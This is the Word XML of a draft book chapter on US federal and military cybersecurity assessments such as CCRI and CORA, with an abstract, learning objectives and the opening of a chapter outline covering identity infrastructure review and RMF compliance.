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40C51" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PART X – TITLE OF BOOK PART</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54292EB4" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B3E55E" w14:textId="3F95AF53" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="0055795F" w:rsidP="0055795F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055795F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">CHAPTER 5. </w:t>
      </w:r>
      <w:r w:rsidRPr="0055795F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>FEDERAL AND MILITARY CYBERSECURITY ASSESSMENTS, INSPECTIONS, AND OPERATIONAL READINESS EVALUATIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00631074" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6BC90178">
          <v:rect id="_x0000_i1055" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7326C2" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2B19F" w14:textId="69BA57EF" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Federal and Military – from the United States’ Navy, Marines, and Army Branches to Air Force branches – rely upon structured inspection programs to evaluate their cybersecurity readiness and preparedness, operational resiliencies, and adherence and alignment to mandated compliance regulations. Among the most significant of these assessments programs is none other than the United States Cyber Operational Readiness Assessment (CORA) (formerly the United States Command Cyber Readiness Inspection, or CCRI), which assess technical implementations, operational processes, risk management activities, and Command and Combatant mission assurance capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A73F5" w14:textId="5CEC72D0" w:rsidR="004874C1" w:rsidRPr="005D3438" w:rsidRDefault="004874C1" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cybersecurity readiness within Federal and Military environments extends beyond the implementation of technical, administrative, and physical security controls and the completion of Risk Management Framework (RMF) authorization and compliance maintainer activities. Agencies must continuously demonstrate that cybersecurity controls remain operating per intended use, are not tampered with, that they are effectively operationally relevant, and capable of supporting Command and Combatant mission-critical objectives through recurring security assessments, inspections, evaluations, and readiness validation activities. Historically, the United States Cyber Command Readiness Inspection (CCRI) served as the primary mechanism for measuring a Command’s cybersecurity compliance and operational posture across Department of Defense (DoD) commands. As cybersecurity threats evolved and mission dependency upon information systems increased, assessment methodologies likewise evolved toward more operationally focused models such as the United States Cyber Operational Readiness Assessment (CORA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E67A3A" w14:textId="7C7EA5F6" w:rsidR="004874C1" w:rsidRPr="005D3438" w:rsidRDefault="004874C1" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This chapter examines the evolution of Federal and Military cybersecurity assessment programs and initiatives, the historical role of CCRIs, the emergence of CORA methodologies, and the increasing emphasis on Command and Combatant mission assurance, operational effectiveness, and cyber resilience. Readers will explore how cybersecurity assessments support RMF continuous monitoring activities, validate security control effectiveness, identify an agency’s organizational risk, and assist leadership and chains of command in making informed risk management decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC717EB" w14:textId="70B345BA" w:rsidR="004874C1" w:rsidRPr="005D3438" w:rsidRDefault="004874C1" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Emphasis is placed on the evaluation of identity-centric infrastructure including Active Directory, Public Key Infrastructure (PKI), Active Directory Certificate Services (AD CS), Active Directory Federation Services (AD FS), Active Directory Domain Services (AD DS), Microsoft Entra ID, authentication systems, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privileged Access Management (PAM) systems, and enterprise identity governance programs and processes. Readers will also learn how assessors accurately examine technical, administrative, and physical implementations, security documentation, operational procedures, vulnerability and patch management activities, incident response capabilities, and continuous logging and monitoring programs to determine Command and Combatant cybersecurity attack preparedness and readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5740A22F" w14:textId="6E5EA349" w:rsidR="004874C1" w:rsidRPr="005D3438" w:rsidRDefault="004874C1" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Furthermore, this chapter further explores common assessment findings, evidence and artifact collection methodologies, remediation and mitigation planning activities, vulnerability and patch remediation processes, and the relationship between assessment results, Plans of Action and Milestone (POA&amp;Ms), authorization decisions, and Command and Combatant mission risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23819CFE" w14:textId="3221EF30" w:rsidR="004874C1" w:rsidRPr="005D3438" w:rsidRDefault="004874C1" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By understanding both historical and modern assessment frameworks, readers will gain the knowledge necessary to prepare for, support, conduct, and respond appropriately to cybersecurity assessments within Federal and Military identity-centric realms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72851619" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="194A4E02">
          <v:rect id="_x0000_i1056" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADA84D" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="00E303E6" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E303E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LEARNING OBJECTIVES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1E8F79" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Upon completion of this chapter, readers will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52731EC0" w14:textId="73A94968" w:rsidR="00631074" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explain the purpose and evolution of Federal and Military cybersecurity assessment programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E093B" w14:textId="5E1FCC2F" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Differentiate between Command Cyber Readiness Inspections (CCRIs), Cyber Operational Readiness Assessments (CORAs), Security Control Assessments (SCAs), Inspector General (IG) inspections, and other cybersecurity evaluation methodologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2DFEAB" w14:textId="6B4D59E9" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Describe how cybersecurity assessments support Risk Management Framework (RMF) authorization and continuous monitoring activities and objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C77BED" w14:textId="438B696E" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explain the transition from compliance-focused inspections toward mission-focused operational readiness assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB978A8" w14:textId="4726147E" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Understand how cybersecurity readiness directly supports Command and Combatant mission assurance, operational resilience, and agency risk management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216D033" w14:textId="0F8A461A" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identify the major cybersecurity domains evaluated during Federal and Military security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8FD4AB" w14:textId="09D2C445" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand how identity-centric infrastructure including Active </w:t>
      </w:r>
      <w:r w:rsidR="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, PKI, AD CS, AD FS, Microsoft Entra ID, and Privileged Access Management (PAM) systems are evaluated during assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59790196" w14:textId="6E265859" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recognize common assessment findings affecting authentication, authorization, auditing, privileged access, vulnerability and patch management cadence, and identity governance programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7BD2B1" w14:textId="24106A97" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Understand assessment evidence and artifact requirements, artifact collection procedures, and documentation validation methodologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A920C4B" w14:textId="06CCB49C" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain how assessment findings influence POA&amp;M development, risk acceptance decisions by AOs, remediation planning, and authorization activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABC57E" w14:textId="5C403D37" w:rsidR="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Develop strategies for preparing identity infrastructure and cybersecurity programs for security assessment activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F8717" w14:textId="61D6B915" w:rsidR="00631074" w:rsidRPr="00E24645" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apply cybersecurity assessment principles to Federal and Military identity-centric environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E40F1" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="005D3438" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="529F6E7A">
          <v:rect id="_x0000_i1057" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E313F" w14:textId="77777777" w:rsidR="00631074" w:rsidRPr="00E303E6" w:rsidRDefault="00631074" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E303E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER STRUCTURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324139B" w14:textId="30983DEA" w:rsidR="00631074" w:rsidRPr="00E24DE9" w:rsidRDefault="00E24645" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.1 Federal and Military Command and Combatant Cybersecurity Assessments, Inspections, and Security Evaluations and Audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10F35B" w14:textId="512A9BFC" w:rsidR="00631074" w:rsidRDefault="00E24645" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00DE4058">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How Federal and Military Cybersecurity Assessments Exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572AF55" w14:textId="2BD33DFC" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1.2 Evolution of Federal and Military Cybersecurity Evaluation Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60C74C" w14:textId="5C7C2993" w:rsidR="00DE4058" w:rsidRDefault="00DE4058" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1.3 Command and Combatant Mission Assurance and Cybersecurity Readiness</w:t>
      </w:r>
    </w:p>
